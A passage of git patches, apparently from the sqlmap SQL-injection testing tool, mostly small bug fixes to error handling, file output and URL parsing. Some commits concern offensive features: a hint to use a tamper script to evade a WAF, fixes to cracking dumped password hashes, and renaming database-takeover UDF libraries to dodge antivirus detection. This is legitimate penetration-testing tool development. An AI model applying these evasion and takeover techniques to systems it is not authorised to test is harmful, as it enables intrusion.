+                    errMsg += "'mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME' "
+                    errMsg += "or 'access://DATABASE_FILEPATH')"
                     raise SqlmapSyntaxException(errMsg)
 
                 if dbmsName in (DBMS.MSSQL, DBMS.SYBASE):

From 4e7f835eae3ec766369570fac98d6b36f5783686 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 7 Dec 2014 16:11:07 +0100
Subject: [PATCH 200/492] Patch for an Issue #994

---
 lib/request/connect.py | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/lib/request/connect.py b/lib/request/connect.py
index 77464bc44..9cd6dbcc3 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -11,6 +11,7 @@ import logging
 import re
 import socket
 import string
+import struct
 import time
 import traceback
 import urllib2
@@ -528,7 +529,7 @@ class Connect(object):
                 debugMsg = "got HTTP error code: %d (%s)" % (code, status)
                 logger.debug(debugMsg)
 
-        except (urllib2.URLError, socket.error, socket.timeout, httplib.BadStatusLine, httplib.IncompleteRead, ProxyError, SqlmapCompressionException), e:
+        except (urllib2.URLError, socket.error, socket.timeout, httplib.BadStatusLine, httplib.IncompleteRead, struct.error, ProxyError, SqlmapCompressionException), e:
             tbMsg = traceback.format_exc()
 
             if "no host given" in tbMsg:
@@ -542,6 +543,8 @@ class Connect(object):
                 warnMsg = "connection timed out to the target URL"
             elif "URLError" in tbMsg or "error" in tbMsg:
                 warnMsg = "unable to connect to the target URL"
+            elif "unpack requires a string argument of length 4" in tbMsg:
+                warnMsg = "there has been a problem with NTLM authentication"
             elif "BadStatusLine" in tbMsg:
                 warnMsg = "connection dropped or unknown HTTP "
                 warnMsg += "status code received"

From 20c272b77d12f3c3c6b804369689efe1b82976d3 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 7 Dec 2014 16:14:48 +0100
Subject: [PATCH 201/492] More generic patch for an Issue #994

---
 lib/request/connect.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/request/connect.py b/lib/request/connect.py
index 9cd6dbcc3..1e7ad5141 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -543,7 +543,7 @@ class Connect(object):
                 warnMsg = "connection timed out to the target URL"
             elif "URLError" in tbMsg or "error" in tbMsg:
                 warnMsg = "unable to connect to the target URL"
-            elif "unpack requires a string argument of length 4" in tbMsg:
+            elif "NTLM" in tbMsg:
                 warnMsg = "there has been a problem with NTLM authentication"
             elif "BadStatusLine" in tbMsg:
                 warnMsg = "connection dropped or unknown HTTP "

From a7b21a2f62a972d57a90756f82b819c9acf92686 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 9 Dec 2014 09:02:06 +0100
Subject: [PATCH 202/492] Rerun advice update

---
 lib/controller/controller.py | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/lib/controller/controller.py b/lib/controller/controller.py
index 37dcc6e25..3979f1d8e 100644
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -573,6 +573,11 @@ def start():
                         errMsg += "expression that you have chosen "
                         errMsg += "does not match exclusively True responses"
 
+                    if not conf.tamper:
+                        errMsg += " If you suspect that there is some kind of protection mechanism "
+                        errMsg += "involved (e.g. WAF) maybe you could retry "
+                        errMsg += "with an option '--tamper' (e.g. '--tamper=space2comment')"
+
                     raise SqlmapNotVulnerableException(errMsg)
             else:
                 # Flush the flag

From d700e50b365489f819e5f11ac027b74bfa6c3072 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 10 Dec 2014 06:37:17 +0100
Subject: [PATCH 203/492] Minor update related to the Issue #993

---
 lib/techniques/error/use.py | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py
index 47098eb44..37630b04b 100644
--- a/lib/techniques/error/use.py
+++ b/lib/techniques/error/use.py
@@ -134,6 +134,12 @@ def _oneShotErrorUse(expression, field=None):
                             check = "(?P<result>.*?)%s" % kb.chars.stop[:2]
                             output = extractRegexResult(check, trimmed, re.IGNORECASE)
 
+                            if not output:
+                                check = "(?P<result>[^\s<>'\"]+)"
+                                output = extractRegexResult(check, trimmed, re.IGNORECASE)
+                            else:
+                                output = output.rstrip()
+
                 if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL)):
                     if offset == 1:
                         retVal = output

From ee20d98bca368b2a07ec4c493de5680448bd1577 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 10 Dec 2014 12:13:37 +0100
Subject: [PATCH 204/492] Minor fix for --forms

---
 lib/core/common.py | 24 ++++++++++++------------
 1 file changed, 12 insertions(+), 12 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 6bbd9c2b5..970e8f1ea 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -3472,18 +3472,18 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
     except UnicodeError:
         pass
     except ParseError:
-        warnMsg = "badly formed HTML at the given URL ('%s'). Going to filter it" % url
-        logger.warning(warnMsg)
-        response.seek(0)
-        filtered = _("".join(re.findall(FORM_SEARCH_REGEX, response.read())), response.geturl())
-        try:
-            forms = ParseResponse(filtered, backwards_compat=False)
-        except ParseError:
-            errMsg = "no success"
-            if raise_:
-                raise SqlmapGenericException(errMsg)
-            else:
-                logger.debug(errMsg)
+        if "<html" in (content or ""):
+            warnMsg = "badly formed HTML at the given URL ('%s'). Going to filter it" % url
+            logger.warning(warnMsg)
+            filtered = _("".join(re.findall(FORM_SEARCH_REGEX, content)), url)
+            try:
+                forms = ParseResponse(filtered, backwards_compat=False)
+            except ParseError:
+                errMsg = "no success"
+                if raise_:
+                    raise SqlmapGenericException(errMsg)
+                else:
+                    logger.debug(errMsg)
 
     if forms:
         for form in forms:

From 10ed97b0dff2bc876b9a4d91183bb2f7a43f5629 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 10 Dec 2014 13:50:29 +0100
Subject: [PATCH 205/492] Patch for an Issue #1010

---
 lib/core/update.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/update.py b/lib/core/update.py
index 1803139b2..acff694c6 100644
--- a/lib/core/update.py
+++ b/lib/core/update.py
@@ -41,7 +41,7 @@ def update():
         logger.debug(debugMsg)
 
         dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
-        process = execute("git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE)
+        process = execute("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE)
         pollProcess(process, True)
         stdout, stderr = process.communicate()
         success = not process.returncode

From 763f720675974a2713635205d3012af2aff73a87 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 11 Dec 2014 00:11:52 +0100
Subject: [PATCH 206/492] Patch for an Issue #1011

---
 lib/core/common.py | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/lib/core/common.py b/lib/core/common.py
index 970e8f1ea..7ee7a565e 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1263,6 +1263,8 @@ def parseTargetUrl():
 
     try:
         _ = conf.hostname.encode("idna")
+    except LookupError:
+        _ = conf.hostname
     except UnicodeError:
         _ = None
 

From 2bcaae3a0b4b10e79e1f9316477e5b23bf4ab3cb Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 11 Dec 2014 00:14:35 +0100
Subject: [PATCH 207/492] Another just in case update for an Issue #1011

---
 lib/core/common.py | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 7ee7a565e..a7739b7ed 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1264,7 +1264,7 @@ def parseTargetUrl():
     try:
         _ = conf.hostname.encode("idna")
     except LookupError:
-        _ = conf.hostname
+        _ = conf.hostname.encode(UNICODE_ENCODING)
     except UnicodeError:
         _ = None
 
@@ -3385,7 +3385,10 @@ def asciifyUrl(url, forceQuote=False):
         return url
 
     # idna-encode domain
-    hostname = parts.hostname.encode("idna")
+    try:
+        hostname = parts.hostname.encode("idna")
+    except LookupError:
+        hostname = parts.hostname.encode(UNICODE_ENCODING)
 
     # UTF8-quote the other parts. We check each part individually if
     # if needs to be quoted - that should catch some additional user

From 6d13b6782227ac11886c765f07c85d2f8a29bac2 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 11 Dec 2014 00:32:26 +0100
Subject: [PATCH 208/492] Patch for an Issue #1012

---
 lib/utils/purge.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/utils/purge.py b/lib/utils/purge.py
index e1f891cff..97b1aaa75 100644
--- a/lib/utils/purge.py
+++ b/lib/utils/purge.py
@@ -79,4 +79,4 @@ def purge(directory):
     try:
         shutil.rmtree(directory)
     except OSError, ex:
-        logger.error("problem occurred while removing directory '%s' ('%s')" % (directory, ex))
+        logger.error("problem occurred while removing directory '%s' ('%s')" % (directory, unicode(ex)))

From 6f211f9d3e4a9558695a1ea6835f23263278fa87 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 11 Dec 2014 00:35:51 +0100
Subject: [PATCH 209/492] Patch for an Issue #1013

---
 lib/parse/configfile.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/parse/configfile.py b/lib/parse/configfile.py
index 7e1b07ad9..7f899398b 100644
--- a/lib/parse/configfile.py
+++ b/lib/parse/configfile.py
@@ -71,8 +71,8 @@ def configFileParser(configFile):
     try:
         config = UnicodeRawConfigParser()
         config.readfp(configFP)
-    except (MissingSectionHeaderError, ParsingError), ex:
-        errMsg = "you have provided an invalid configuration file ('%s')" % str(ex)
+    except Exception, ex:
+        errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % str(ex)
         raise SqlmapSyntaxException(errMsg)
 
     if not config.has_section("Target"):

From 1e06e7c386350786361ce37e42d7fec096617606 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 11 Dec 2014 13:29:26 +0100
Subject: [PATCH 210/492] Adding a debug message during name resolution

---
 lib/controller/checks.py | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 9172904b5..aa6859c54 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -1265,6 +1265,8 @@ def checkNullConnection():
 def checkConnection(suppressOutput=False):
     if not any((conf.proxy, conf.tor, conf.dummy)):
         try:
+            debugMsg = "resolving hostname '%s'" % conf.hostname
+            logger.debug(debugMsg)
             socket.getaddrinfo(conf.hostname, None)
         except socket.gaierror:
             errMsg = "host '%s' does not exist" % conf.hostname

From 785e3d03179108e7bd29038ce6bb49e5dc130b30 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 11 Dec 2014 13:29:42 +0100
Subject: [PATCH 211/492] Patch for an Issue #1014

---
 lib/core/common.py | 12 ++++++++++--
 1 file changed, 10 insertions(+), 2 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index a7739b7ed..c045b05f1 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -853,8 +853,16 @@ def dataToTrafficFile(data):
         raise SqlmapSystemException(errMsg)
 
 def dataToDumpFile(dumpFile, data):
-    dumpFile.write(data)
-    dumpFile.flush()
+    try:
+        dumpFile.write(data)
+        dumpFile.flush()
+    except IOError, ex:
+        if "No space left" in str(ex):
+            errMsg = "no space left on output device"
+            logger.error(errMsg)
+        else:
+            raise
+
 
 def dataToOutFile(filename, data):
     retVal = None

From bb4ac41ff70398083bffbab50f827494c71b8d1d Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 12 Dec 2014 04:40:44 +0100
Subject: [PATCH 212/492] Patch for an Issue #1016

---
 lib/core/common.py | 4 ++--
 lib/core/target.py | 3 ++-
 2 files changed, 4 insertions(+), 3 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index c045b05f1..b9aeb7a0e 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -2849,13 +2849,13 @@ def showHttpErrorCodes():
             msg += "could mean that some kind of protection is involved (e.g. WAF)"
             logger.warn(msg)
 
-def openFile(filename, mode='r', encoding=UNICODE_ENCODING, errors="replace"):
+def openFile(filename, mode='r', encoding=UNICODE_ENCODING, errors="replace", buffering=1):
     """
     Returns file handle of a given filename
     """
 
     try:
-        return codecs.open(filename, mode, encoding, errors)
+        return codecs.open(filename, mode, encoding, errors, buffering)
     except IOError:
         errMsg = "there has been a file opening error for filename '%s'. " % filename
         errMsg += "Please check %s permissions on a file " % ("write" if \
diff --git a/lib/core/target.py b/lib/core/target.py
index 29a0c4665..774d97619 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -18,6 +18,7 @@ from lib.core.common import getUnicode
 from lib.core.common import hashDBRetrieve
 from lib.core.common import intersect
 from lib.core.common import normalizeUnicode
+from lib.core.common import openFile
 from lib.core.common import paramToDict
 from lib.core.common import readInput
 from lib.core.common import resetCookieJar
@@ -497,7 +498,7 @@ def _setResultsFile():
 
     if not conf.resultsFP:
         conf.resultsFilename = os.path.join(paths.SQLMAP_OUTPUT_PATH, time.strftime(RESULTS_FILE_FORMAT).lower())
-        conf.resultsFP = codecs.open(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0)
+        conf.resultsFP = openFile(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0)
         conf.resultsFP.writelines("Target URL,Place,Parameter,Techniques%s" % os.linesep)
 
         logger.info("using '%s' as the CSV results file in multiple targets mode" % conf.resultsFilename)

From 23d33bb5b5074370c8313785a5e04649cadc86e4 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 12 Dec 2014 09:58:42 +0100
Subject: [PATCH 213/492] Patch for an Issue #1017

---
 lib/core/dump.py   | 21 ++++++++++++++++++++-
 lib/core/target.py |  4 ++--
 2 files changed, 22 insertions(+), 3 deletions(-)

diff --git a/lib/core/dump.py b/lib/core/dump.py
index 4d048b2f7..c88445213 100644
--- a/lib/core/dump.py
+++ b/lib/core/dump.py
@@ -9,6 +9,7 @@ import cgi
 import codecs
 import os
 import re
+import tempfile
 import threading
 
 from lib.core.common import Backend
@@ -32,6 +33,7 @@ from lib.core.enums import DBMS
 from lib.core.enums import DUMP_FORMAT
 from lib.core.exception import SqlmapGenericException
 from lib.core.exception import SqlmapValueException
+from lib.core.exception import SqlmapSystemException
 from lib.core.replication import Replication
 from lib.core.settings import HTML_DUMP_CSS_STYLE
 from lib.core.settings import METADB_SUFFIX
@@ -397,7 +399,24 @@ class Dump(object):
             replication = Replication(os.path.join(conf.dumpPath, "%s.sqlite3" % unsafeSQLIdentificatorNaming(db)))
         elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML):
             if not os.path.isdir(dumpDbPath):
-                os.makedirs(dumpDbPath, 0755)
+                try:
+                    os.makedirs(dumpDbPath, 0755)
+                except (OSError, IOError), ex:
+                    try:
+                        tempDir = tempfile.mkdtemp(prefix="sqlmapdb")
+                    except IOError, _:
+                        errMsg = "unable to write to the temporary directory ('%s'). " % _
+                        errMsg += "Please make sure that your disk is not full and "
+                        errMsg += "that you have sufficient write permissions to "
+                        errMsg += "create temporary files and/or directories"
+                        raise SqlmapSystemException(errMsg)
+
+                    warnMsg = "unable to create dump directory "
+                    warnMsg += "'%s' (%s). " % (dumpDbPath, ex)
+                    warnMsg += "Using temporary directory '%s' instead" % tempDir
+                    logger.warn(warnMsg)
+
+                    dumpDbPath = tempDir
 
             dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (normalizeUnicode(unsafeSQLIdentificatorNaming(table)), conf.dumpFormat.lower()))
             appendToFile = os.path.isfile(dumpFileName) and any((conf.limitStart, conf.limitStop))
diff --git a/lib/core/target.py b/lib/core/target.py
index 774d97619..e2d339cac 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -566,7 +566,7 @@ def _createTargetDirs():
                 os.makedirs(paths.SQLMAP_OUTPUT_PATH, 0755)
             warnMsg = "using '%s' as the output directory" % paths.SQLMAP_OUTPUT_PATH
             logger.warn(warnMsg)
-        except OSError, ex:
+        except (OSError, IOError), ex:
             try:
                 tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
             except IOError, _:
@@ -587,7 +587,7 @@ def _createTargetDirs():
     if not os.path.isdir(conf.outputPath):
         try:
             os.makedirs(conf.outputPath, 0755)
-        except OSError, ex:
+        except (OSError, IOError), ex:
             try:
                 tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
             except IOError, _:

From 650dfe952696994c717b76f8a2f83053d724e897 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 12 Dec 2014 14:54:47 +0100
Subject: [PATCH 214/492] Patch for an Issue #1018

---
 lib/techniques/error/use.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py
index 37630b04b..9eb42d063 100644
--- a/lib/techniques/error/use.py
+++ b/lib/techniques/error/use.py
@@ -281,7 +281,7 @@ def errorUse(expression, dump=False):
             # Count the number of SQL query entries output
             countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1)
 
-            if " ORDER BY " in expression.upper():
+            if " ORDER BY " in countedExpression.upper():
                 _ = countedExpression.upper().rindex(" ORDER BY ")
                 countedExpression = countedExpression[:_]
 

From fe58aff26c87f3d3e8b8758f4d2664f6286b2235 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sat, 13 Dec 2014 00:08:18 +0100
Subject: [PATCH 215/492] Patch for an Issue #1019

---
 lib/core/option.py | 8 +++++++-
 1 file changed, 7 insertions(+), 1 deletion(-)

diff --git a/lib/core/option.py b/lib/core/option.py
index 986e1b080..585748d93 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1886,7 +1886,13 @@ def _saveCmdline():
             config.set(family, option, value)
 
     confFP = openFile(paths.SQLMAP_CONFIG, "wb")
-    config.write(confFP)
+
+    try:
+        config.write(confFP)
+    except IOError, ex:
+        errMsg = "something went wrong while trying "
+        errMsg += "to write to the configuration INI file '%s' ('%s')" % (paths.SQLMAP_CONFIG, ex)
+        raise SqlmapSystemException(errMsg)
 
     infoMsg = "saved command line options on '%s' configuration file" % paths.SQLMAP_CONFIG
     logger.info(infoMsg)

From 84ba5f35ac6b336144bc478aa24c8366d97c2536 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sat, 13 Dec 2014 13:41:39 +0100
Subject: [PATCH 216/492] Minor update for #1022

---
 lib/core/common.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index b9aeb7a0e..37555c2e0 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1741,7 +1741,7 @@ def getConsoleWidth(default=80):
 
             if len(items) == 2 and items[1].isdigit():
                 width = int(items[1])
-        except OSError:
+        except (OSError, MemoryError):
             pass
 
     if width is None:

From 25196b45724110ada0c1f50e8acb0ad248becaa8 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sat, 13 Dec 2014 13:48:50 +0100
Subject: [PATCH 217/492] Patch for an Issue #1021

---
 lib/core/option.py | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/lib/core/option.py b/lib/core/option.py
index 585748d93..05ed7c0df 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1188,6 +1188,9 @@ def _setHTTPAuthentication():
     if not conf.authType and not conf.authCred and not conf.authPrivate:
         return
 
+    if conf.authPrivate and not conf.authType:
+        conf.authType = AUTH_TYPE.PKI
+
     elif conf.authType and not conf.authCred and not conf.authPrivate:
         errMsg = "you specified the HTTP authentication type, but "
         errMsg += "did not provide the credentials"
@@ -1198,7 +1201,7 @@ def _setHTTPAuthentication():
         errMsg += "but did not provide the type"
         raise SqlmapSyntaxException(errMsg)
 
-    elif conf.authType.lower() not in (AUTH_TYPE.BASIC, AUTH_TYPE.DIGEST, AUTH_TYPE.NTLM, AUTH_TYPE.PKI):
+    elif (conf.authType or "").lower() not in (AUTH_TYPE.BASIC, AUTH_TYPE.DIGEST, AUTH_TYPE.NTLM, AUTH_TYPE.PKI):
         errMsg = "HTTP authentication type value must be "
         errMsg += "Basic, Digest, NTLM or PKI"
         raise SqlmapSyntaxException(errMsg)

From 9c225557d118a555900576c005a75e63c89521c6 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sat, 13 Dec 2014 14:08:37 +0100
Subject: [PATCH 218/492] Patch for an Issue #1020

---
 lib/utils/hash.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/utils/hash.py b/lib/utils/hash.py
index a657f4fee..7f99b7cea 100644
--- a/lib/utils/hash.py
+++ b/lib/utils/hash.py
@@ -329,7 +329,7 @@ def wordpress_passwd(password, salt, count, prefix, uppercase=False):
         return output
 
     cipher = md5(salt)
-    cipher.update(password)
+    cipher.update(password.encode(UNICODE_ENCODING))
     hash_ = cipher.digest()
 
     for i in xrange(count):

From 5166675ff50e890dbcd9682c65c8321db38f7e2b Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sat, 13 Dec 2014 23:32:18 +0100
Subject: [PATCH 219/492] Patch for an Issue #1024

---
 lib/utils/hash.py | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/lib/utils/hash.py b/lib/utils/hash.py
index 7f99b7cea..91aba6827 100644
--- a/lib/utils/hash.py
+++ b/lib/utils/hash.py
@@ -405,9 +405,10 @@ def attackCachedUsersPasswords():
 
         for user in kb.data.cachedUsersPasswords.keys():
             for i in xrange(len(kb.data.cachedUsersPasswords[user])):
-                value = kb.data.cachedUsersPasswords[user][i].lower().split()[0]
-                if value in lut:
-                    kb.data.cachedUsersPasswords[user][i] += "%s    clear-text password: %s" % ('\n' if kb.data.cachedUsersPasswords[user][i][-1] != '\n' else '', lut[value])
+                if (kb.data.cachedUsersPasswords[user][i] or "").strip():
+                    value = kb.data.cachedUsersPasswords[user][i].lower().split()[0]
+                    if value in lut:
+                        kb.data.cachedUsersPasswords[user][i] += "%s    clear-text password: %s" % ('\n' if kb.data.cachedUsersPasswords[user][i][-1] != '\n' else '', lut[value])
 
 def attackDumpedTable():
     if kb.data.dumpedTable:

From b42a15d8768e93139cfdb658b93a454c334014b6 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sat, 13 Dec 2014 23:37:04 +0100
Subject: [PATCH 220/492] Minor patch related to the Issue #1025

---
 plugins/dbms/sybase/enumeration.py | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/plugins/dbms/sybase/enumeration.py b/plugins/dbms/sybase/enumeration.py
index 9a1da9ae6..128819104 100644
--- a/plugins/dbms/sybase/enumeration.py
+++ b/plugins/dbms/sybase/enumeration.py
@@ -10,6 +10,7 @@ from lib.core.common import filterPairValues
 from lib.core.common import isTechniqueAvailable
 from lib.core.common import randomStr
 from lib.core.common import safeSQLIdentificatorNaming
+from lib.core.common import unArrayizeValue
 from lib.core.common import unsafeSQLIdentificatorNaming
 from lib.core.data import conf
 from lib.core.data import kb
@@ -67,6 +68,8 @@ class Enumeration(GenericEnumeration):
             users = kb.data.cachedUsers
 
         for user in users:
+            user = unArrayizeValue(user)
+
             if user is None:
                 continue
 

From 87f87534837e065176df66316ac0a508d54dd51c Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 14 Dec 2014 00:10:43 +0100
Subject: [PATCH 221/492] Fixing a problem with AV detection

---
 plugins/dbms/mysql/takeover.py                  |   7 +++++--
 plugins/dbms/postgresql/takeover.py             |   7 +++++--
 udf/mysql/linux/32/lib_mysqludf_sys.so          | Bin 5696 -> 0 bytes
 udf/mysql/linux/32/lib_mysqludf_sys.so_         | Bin 0 -> 2512 bytes
 udf/mysql/linux/64/lib_mysqludf_sys.so          | Bin 8040 -> 0 bytes
 udf/mysql/linux/64/lib_mysqludf_sys.so_         | Bin 0 -> 3200 bytes
 udf/mysql/windows/32/lib_mysqludf_sys.dll       | Bin 6144 -> 0 bytes
 udf/mysql/windows/32/lib_mysqludf_sys.dll_      | Bin 0 -> 4309 bytes
 udf/mysql/windows/64/lib_mysqludf_sys.dll       | Bin 11264 -> 0 bytes
 udf/mysql/windows/64/lib_mysqludf_sys.dll_      | Bin 0 -> 4773 bytes
 .../linux/32/8.2/lib_postgresqludf_sys.so       | Bin 5124 -> 0 bytes
 .../linux/32/8.2/lib_postgresqludf_sys.so_      | Bin 0 -> 2452 bytes
 .../linux/32/8.3/lib_postgresqludf_sys.so       | Bin 5124 -> 0 bytes
 .../linux/32/8.3/lib_postgresqludf_sys.so_      | Bin 0 -> 2450 bytes
 .../linux/32/8.4/lib_postgresqludf_sys.so       | Bin 5132 -> 0 bytes
 .../linux/32/8.4/lib_postgresqludf_sys.so_      | Bin 0 -> 2452 bytes
 .../linux/32/9.0/lib_postgresqludf_sys.so       | Bin 6512 -> 0 bytes
 .../linux/32/9.0/lib_postgresqludf_sys.so_      | Bin 0 -> 3262 bytes
 .../linux/32/9.1/lib_postgresqludf_sys.so       | Bin 6432 -> 0 bytes
 .../linux/32/9.1/lib_postgresqludf_sys.so_      | Bin 0 -> 3168 bytes
 .../linux/64/8.2/lib_postgresqludf_sys.so       | Bin 7704 -> 0 bytes
 .../linux/64/8.2/lib_postgresqludf_sys.so_      | Bin 0 -> 3083 bytes
 .../linux/64/8.3/lib_postgresqludf_sys.so       | Bin 7704 -> 0 bytes
 .../linux/64/8.3/lib_postgresqludf_sys.so_      | Bin 0 -> 3086 bytes
 .../linux/64/8.4/lib_postgresqludf_sys.so       | Bin 7712 -> 0 bytes
 .../linux/64/8.4/lib_postgresqludf_sys.so_      | Bin 0 -> 3088 bytes
 .../linux/64/9.0/lib_postgresqludf_sys.so       | Bin 7920 -> 0 bytes
 .../linux/64/9.0/lib_postgresqludf_sys.so_      | Bin 0 -> 3213 bytes
 .../windows/32/8.2/lib_postgresqludf_sys.dll    | Bin 6656 -> 0 bytes
 .../windows/32/8.2/lib_postgresqludf_sys.dll_   | Bin 0 -> 4755 bytes
 .../windows/32/8.3/lib_postgresqludf_sys.dll    | Bin 6656 -> 0 bytes
 .../windows/32/8.3/lib_postgresqludf_sys.dll_   | Bin 0 -> 4766 bytes
 .../windows/32/8.4/lib_postgresqludf_sys.dll    | Bin 6656 -> 0 bytes
 .../windows/32/8.4/lib_postgresqludf_sys.dll_   | Bin 0 -> 4773 bytes
 .../windows/32/9.0/lib_postgresqludf_sys.dll    | Bin 5632 -> 0 bytes
 .../windows/32/9.0/lib_postgresqludf_sys.dll_   | Bin 0 -> 4231 bytes
 36 files changed, 10 insertions(+), 4 deletions(-)
 delete mode 100644 udf/mysql/linux/32/lib_mysqludf_sys.so
 create mode 100644 udf/mysql/linux/32/lib_mysqludf_sys.so_
 delete mode 100644 udf/mysql/linux/64/lib_mysqludf_sys.so
 create mode 100644 udf/mysql/linux/64/lib_mysqludf_sys.so_
 delete mode 100644 udf/mysql/windows/32/lib_mysqludf_sys.dll
 create mode 100644 udf/mysql/windows/32/lib_mysqludf_sys.dll_
 delete mode 100644 udf/mysql/windows/64/lib_mysqludf_sys.dll
 create mode 100644 udf/mysql/windows/64/lib_mysqludf_sys.dll_
 delete mode 100644 udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so
 create mode 100644 udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
 delete mode 100755 udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so
 create mode 100644 udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
 delete mode 100755 udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so
 create mode 100644 udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_
 delete mode 100755 udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so
 create mode 100644 udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_
 delete mode 100755 udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so
 create mode 100644 udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_
 delete mode 100755 udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so
 create mode 100644 udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_
 delete mode 100755 udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so
 create mode 100644 udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_
 delete mode 100755 udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so
 create mode 100644 udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_
 delete mode 100755 udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so
